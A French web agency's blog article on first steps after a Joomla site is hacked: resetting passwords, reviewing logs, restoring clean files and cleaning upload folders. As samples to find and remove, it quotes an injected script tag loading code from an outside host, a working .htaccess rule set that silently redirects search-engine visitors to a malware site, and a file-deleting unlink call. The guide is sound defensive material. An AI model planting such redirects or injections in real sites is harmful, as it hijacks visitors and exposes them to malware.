En poursuivant votre navigation sur ce site, vous acceptez l’utilisation des cookies

Premiers réflexes lors d'un piratage

Évaluer cet élément
(117 Votes)

Votre site vient d'être piraté, voici ce que vous pouvez faire ...

Voici quelques conseils pour tenter de remonter votre site dans l'urgence sans trop de dégât.

A appliquer à vos risques et périls, Webcrea s.a.r.l. ne pouvant être tenu pour responsable de pertes de données ou de dysfonctionnement suite à l'application de ces suggestions.

C'est toujours délicat d'avoir à réparer une installation joomla, le plus souvent on n'a pas de copie récente, le joomla est antique, on n'a plus les compétences en interne et on a des clients à satisfaire.

Vous avez toujours accès à l'administration (votre_domaine/administrator/)

Tout d'abord changer TOUS les mots de passe :

Dans l'administration joomla :

  • Tous les utilisateurs "super-user" : Changer les mots de passe
  • Faire une vérification des utilisateurs inscrits
  • Supprimer les "fake" : Les "fake" sont des utilisateurs qui n'ont jamais confirmé leur inscription ou qui ont un profil suspect
  • Désactivez ceux qui vous semblent suspects : Un email étrange comme Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser., un nom d'utilisateur du style zzzyyy

Il faut savoir que les robots des hackers se délectent d'un processus d'inscription sans captcha ou vérification humaine. C'est pour eux une première indication que le site ne dispose pas d'un webmaster compétent. Ils vont commencer à s'installer et à creuser leur nid en testant les failles les plus connues.

Suspendre ou restreindre aux utilisateurs enregistrés les fonctionnalités de certains composants permettant de décharger des fichiers sur le serveur (images, avatars, doc...etc)

Suspendre l'inscription au site si vous êtes en situation de crise

Dans votre manager ou panel chez votre hébergeur : changez les mots de passe

  • FTP
  • MySql (Cela implique que vous devrez modifier le fichier configuration.php de votre site Joomla)
  • Votre propre mot de passe, c'est important de verrouiller les accès principaux

Consultez vos logs pour tenter de localiser la requête fautive et, bien sûr, exclure votre propre IP (Votre iP sur http://whatismyipaddress.com/ )

  • Appel direct à un composant
  • Tentative de connexion à l'administrator
  • Appel d'un fichier php dans un répertoire tel que images/ tmp/ ou cache/

Récupérez l'intégralité de votre site sur votre ordinateur muni d'un anti-virus dans un répertoire que vous nommerez "verole" par exemple

Vous disposez d'une copie de votre site en local récente

Créer un répertoire et déplacer tous les fichiers/répertoires du serveur dans ce répertoire et exportez votre version saine, si le site remonte, c'est bon, récupérer éventuellement les fichiers qui ne seraient pas dans votre copie saine et supprimez le répertoire contenant le site vérolé.

Vous ne disposez pas de copie

Dézippez une installation de joomla de même version que la vôtre, comparez les 2 versions, supprimez les fichiers non-présents dans la version de joomla "fraîche", les seules différences que vous pourriez rencontrer sont des composants, modules, plugins ou extensions que vous auriez installées sur votre site en production et qui ne sont pas dans le package de base joomla ainsi que des images et des documents.

nb : Si vous n'avez plus accès à l'administrator, la version de joomla, pour les 1.5, se trouve dans librairies/joomla/version.php

Les répertoire images/ caches/ et tmp/

La principale porte d'entrée des hackers est souvent le répertoire "images" et "images/stories" pour les anciennes versions de Joomla (1.5) car il est aussi souvent le répertoire cible des composants permettant aux tiers de décharger des photos, fichiers et avatars. Donc, ce répertoire mérite une attention toute particulière. Vous devez vérifier TOUS les fichiers et vous ne devez trouver dans ce répertoire QUE des suffixes d'images tels que : .jpg, .gif, .png...etc

pas de .php. Certaines vieilles extensions mettaient un index.php à la racine de tous ses sous-répertoires : Remplacez les par des index.html vides (vous en trouverez dans d'autres répertoires, le fichier ne fait que 44 octets et ...est vide)

  • Vérifiez toutes vos images.
    Le gestionnaire de médias vous révèlera des fichiers mal nommés, vous ne pourrez les supprimer que via un logiciel serveur avec un accès SSH

    Astuce : Vous pouvez passer par la "gestion des médias", en cliquant sur le mode "Détails", le gestionnaire vous monte la vue en mode listing. S'il ne vous indique pas de dimensions, seulement x au lieu 300 x 500 par exemple, c'est surement parce que le fichier n'est pas une image, supprimez-la. Idem si les dimensions sont extravagantes du style 16520x17523...
  • Videz cache et tmp, seul doit rester index.html (Note : Certaines vieilles versions de joomla contiennent des fichier .php pour la gestion, en cas de doute, consulter une version saine identique à la votre)

Créer un répertoire et déplacer tous les fichiers/répertoires du serveur dans ce répertoire et exportez votre version saine, si le site remonte, c'est bon, supprimez le répertoire contenant le site vérolé après avoir éventuellement récupérer des fichiers qui vous manqueraient, mais vérifiez les!!! Si vous n'êtes pas sûr d'avoir tout récupérer, changez les droits en 700 sur ce répertoire en attendant d'être convaincu que vous avez tout récupéré, et, bien sûr, supprimez le.

Astuce : Quand vous vérifiez votre arborescence, concentrez vous sur les dates de modification/création du fichier ainsi que sur sa taille

Les attaques par inclusion de code dans vos fichier .php

L'une des attaques classiques qui ne vous sera pas dévoilée par votre hébergeur mais par les moteurs de recherche ou les anti-virus sont les attaques par inclusion de code dans vos pages.

Elles ne bloquent pas votre site mais effectuent des requêtes vers d'autres serveurs contenant du code malveillant. Cela entraîne des temps de réponse démesurés et les moteurs de recherche suivant les liens présents sur votre site considèrent que vos pages contiennent du code malveillant et vous pénalise. Il est fortement recommandé d'intervenir le plus vite possible afin de ne pas vous pénaliser auprès des moteurs qui automatiquement dégradent votre référencement.

Le plus souvent c'est javaScript qui est utilisé, les appels ressemblent à ça :

<script type="text/javasc ript" src="/ht tp://hack.at/ api.js">

Le remède consiste à effectuer un chercher/remplacer de ce "motif" de code dans tout le site et de le supprimer tout simplement.

Astuce : Cette recherche peut-être faite directement sur le serveur si vous avez un accès SSH, avec la commande find 

Akeeba BackupTM révèle les fichiers bloqués en écriture

Je me suis rendu compte qu'en effectuant un backup avec akeeba, le composant émet des alertes sur les fichiers bloqués en écriture. Il se peut que cela soit l'oeuvre de l'anti-virus de votre hébergeur et cela va nous être très utile.

Via votre logiciel client FTP, vous pouvez débloquer le fichier en forçant ses permissions sur 644

Les fichiers récupérés sur votre ordinateur vous révèleront ce type de codes

Vérifiez que ce fichier ne fait pas partie de Joomla (Voir un Joomla sain). Si oui, uploader le fichier sain sinon, supprimez le fichier.

Le .htaccess : reroutage de traffic

Le pirate ajoute son détournement dans le fichier htaccess avec l'écriture de quelques lignes :

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sitemalware.tld/bad.php?t=3 [R,L]
</IfModule>

Ainsi en tapant directement l'adresse de son site dans le navigateur, le webmaster ne voit pas que son référencement a été modifié alors que les visiteurs ayant effectué une recherche depuis google et autres sont automatiquement détournés sur d'autres sites.

En résumé, en plus de tous les fichiers à vérifier, n'oubliez pas d'éditer le fichier .htaccess pour contrôler et supprimer le code de détournement.

(Merci à Yann Gomeiro alias Daneel)

Les principales attaques sur joomla sont :

  • Suppression du fichier configuration.php à la racine --> Uploader un configuration.php, attention à ce qu'il soit à jour de vos paramétrages (base mysql, préfixe de table...etc)
    Si le site remonte, c'est ... presque bon ... il faut trouver la requête cachée dans un fichier .php qui supprime la config en général une commande du style unlink("../../../../../../configuration.php")
  • Modification de l'index.php à la racine --> Uploader un index.php sain
  • Modification ou suppression de l'index.php à la racine de votre template --> Uploader un index.php sain
  • Requête sur un .php anormal --> Le supprimer
  • Requête sur un fichier de joomla transformé --> Uploader un fichier sain tiré d'une installation joomla fraîche
  • Fausse image --> Supprimer
  • Fichiers cachés --> Connexion ssh commande ls-la si des fichiers bizarres apparaissent, les supprimer avec rm-rf nom_du_fichier_bizarre
  • Répertoire impossible à supprimer alors qu'il est vide --> Connexion ssh commande ls-la si des fichiers bizarres apparaissent, les supprimer avec rm-rf nom_du_fichier_bizarre
  • Template vérolé alors qu'il n'est même pas utilisé : Certains templates anciens, peu suivis dans leurs mises à jour sont des nids de "backdoors" --> Suppression des templates inutiles, ainsi que ceux inclus avec le package Joomla. Attention à ne pas supprimer le template admin (Isis).

Une fois votre site à nouveau accessible, n'oubliez pas de le mettre à jour ainsi que toutes les extensions. Ceci afin de vous prévenir d'une prochaine attaque...

Webcrea est à votre disposition pour une intervention en urgence sur votre site internet : Site "hacké" demande d'intervention 

Lu 21867 fois Dernière modification le mardi, 28 mars 2017 10:37

2 Commentaires

  • Lien vers le commentaire Christophe lundi, 12 septembre 2016 12:40 Posté par Christophe

    Site d'informations sur les mises à jour de Joomla.
    http://feeds.joomla.org/JoomlaSecurityNews

  • Lien vers le commentaire teclean mardi, 04 août 2015 23:02 Posté par teclean

    Un article très intéressant qui permet à une personne peu experte d'avoir les bons réflexes.
    Car dans ce genre de situation, on n'est jamais suffisamment averti et c'est lorsque l'on y est confronté, qu'on commence à paniquer dans tous les sens.
    Après je dirais que lorsque l'on a un bon prestataire, de confiance, rien de mieux que de ce tourner vers lui pour régler le problème : gain de temps (et donc d'argent au final), pas de stress inutile... et les bons conseils. Pour ma part, j'ai choisi Webcrea, car j'ai trouvé le professionnalisme, la disponibilité, le suivi dans la prestation et la sympathie en la personne de Christophe, avec qui il est agréable de collaborer. Je recommande vivement !
    Nathalie
    http://www.teclean.fr

Connectez-vous pour commenter